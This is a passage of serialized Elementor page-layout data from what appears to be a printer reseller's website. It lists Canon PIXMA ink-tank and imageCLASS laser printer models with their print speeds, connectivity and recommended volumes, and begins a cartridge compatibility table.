pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 